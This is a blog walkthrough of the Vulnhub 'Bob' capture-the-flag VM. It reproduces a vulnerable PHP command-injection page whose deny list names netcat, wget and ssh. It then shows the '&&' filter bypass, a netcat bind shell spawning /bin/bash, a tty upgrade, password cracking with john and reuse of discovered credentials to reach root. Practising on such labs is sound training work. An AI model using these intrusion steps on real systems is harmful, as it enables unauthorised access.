BOB Walkthrough: Vulnhub CTF Challenge


This article is a walkthrough on how I solved Bob CTF challenge. You can download Bob CTF via this link: https://www.vulnhub.com/entry/bob-101,226/.

It is a Beginner to intermediate challenge and at the end we have to gain the root access and get the flag.

So let’s do this:

To find the vulnerable machines through your attacking machine: http://www.anonhack.in/2018/06/part-2-finding-the-ip-address-of-your-victim-in-your-vmware-hacking-lab-network/

I used netdiscover to get the ipaddress of Bob Virtual machine. In my case, The ip address is 192.168.0.107.

netdiscover -r 192.168.0.1/24

I scanned the host with nmapand discovered this:

So 80 and 21 are open. I visited their website.

It is under construction. Couldn’t find much of the information with source code too. So, I fired up nikto to get more info:

nikto -h 192.168.0.107

It says robots.txt is present.

The passwords.html page contains this:

Really who made this file at least get a hash of your password to display, hackers can’t do anything with a hash, this is probably why we had a security breach in the first place. Comeon people this is basic 101 security! I have moved the file off the server. Don’t make me have to clean up the mess everytime someone does something as stupid as this. We will have a meeting about this and other stuff I found on the server. >:(
-Bob

login.php and lat_memo.html also doesn’t contain much information. Then, I turned to dev_shell.php:

Seems like the admin gave us a command injection platform. I used a lot of commands here but I will only give the useful ones in this article.

I tried ls as my first command.

But it isn’t seem to work so I used stacked approach to see if that works and it does work:

cd . &&ls -a gave me the above result. When I looked in the same directory in which I am. I found 2 important files: .hint and dev_shell.bak

I downloaded dev_shell.bak. It has the following code:

<html>
<body>
<?php
//init
$invalid = 0;
$command = ($_POST[‘in_command’]);
$bad_words = array(“pwd”, “ls”, “netcat”, “ssh”, “wget”, “ping”, “traceroute”, “cat”, “nc”);
?>
<style>
#back{
position: fixed;
top: 0;
left: 0;
min-width: 100%;
min-height: 100%;
z-index:-10
}
#shell{
color: white;
text-align: center;
}
</style>
<div id=”shell”>
<h2>
dev_shell
</h2>
<form action=”dev_shell.php” method=”post”>
Command: <input type=”text” name=”in_command” /> <br>
<input type=”submit” value=”submit”>
</form>
<br>
<h5>Output:</h5>
<?php
system(“running command…”);
//executes system Command
//checks for sneaky ;
if (strpos($command, ‘;’) !==false){
system(“echo Nice try skid, but you will never get through this bulletproof php code”); //doesn’t work 😛
}
else{
$is_he_a_bad_man = explode(‘ ‘, trim($command));
//checks for dangerous commands
if (in_array($is_he_a_bad_man[0], $bad_words)){
system(“echo Get out skid lol”);
}
else{
system($_POST[‘in_command’]);
}
}
?>

It’s simply an input sanitize script which seems to trim commands given in the array. Now, I know why ls command was not working. 😛

the .hint file which is a hidden file have following text:

No, I haven’t tried spawning a tty shell till yet. So let’s spawn a shell:

netcat cheat sheet came to rescue. With the above php script, I gathered that nc is installed and I can use it to open a bind shell on any port. I used

cd .&&nc -l -p 3333 -e /bin/bash

and then on my kali os, I used this command: nc 192.168.0.107 3333

and I got a shell. This is not a real shell so I spawned a bash shell using:

python -c ‘import tty;tty.spawn(“/bin/bash”)’

once, I got the real shell I checked for hidden files. I check the home directory and found that this vm has 4 users: bob,elliot,jc,seb. I check the elliot directory first and Lands on to this file theadminisdumb.txt which said:

with this I knew that elliot is not an admin but the bob is. It also gives information about the password of James [who is jc] which is Qwerty and Elliot’s password which is theadminisdumb. So I tried logging in 

su elliot //password: theadminisdumb doesn’t work 

su james //password: Qwerty works

Now, I traversed the directory for Bob and found a hidden file: .old_passwordfile.html which gave me the password for sebastian [user seb] which is T1tanium_Pa$$word_Hack3rs_Fear_M3.

su seb //password works 😉

So, now I need to know the password for Bob, elliot’s password is not required since he is not the admin here. So I searched the bob’s directory for any password file and I landed on to Downloads.

 I found backed up ftp for bob and I put it on  john and it decrypts to Qwerty. So I tried it on both on ftp and normal OS login but it doesn’t work.

I further searched the Documents directory where I came across these files: login.txt.gpg [I overlooked this file as jpg before 😛 and then I saw it again]

Secret [I overlooked login.txt.gpg for this folder. ;p]

and then staff.txt which doesn’t contain much information.

I went to secret folder and at the end of it found notes.sh and I opened it.

At first I thought it is of no use but then it occurred to me that the starting letters of these echoed lines forms: “HARPOCRATES”.I thought to try it on bob but it didn’t work.

So I went back and started looking again, all frustrated!!

I found the flag.txt which is in cd / directory. But I can’t open it unless I am root.

Remember the file login.txt.gpg ? That’s my last queue!

I google .gpg and found this:

GnuPG is a complete and free implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories. GnuPG, also known as GPG, is a command line tool with features for easy integration with other applications. A wealth of frontend applications and libraries are available. GnuPG also provides support for S/MIME and Secure Shell (ssh).

login.txt.gpg is an encrypted file and I need a passphrase to decrypt it and I only got “HARPOCRATES” which I found in Bob’s directories.

So I tried gpg -d login.txt.gpg on console but it is not giving a prompt for the passphrase entry. Another problem!

So I searched more ways to pass the passphrase in the command-line itself.

Found about the batch mode where in you can pass the decryption key with commandline itself.

gpg –batch –passphrase HARPOCRATES –decrypt login.txt.gpg

the password for bob is b0bcat_

I logged in as bob but I still can’t access the flag.txt file, it gave me this output when I cat /flag.txt

I used less and more editors too but then my access is denied. So I tried logging as root with the same password as bob’s, I got in and here is the flag.

That’s it for now!

Ciao 🙂

 


Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.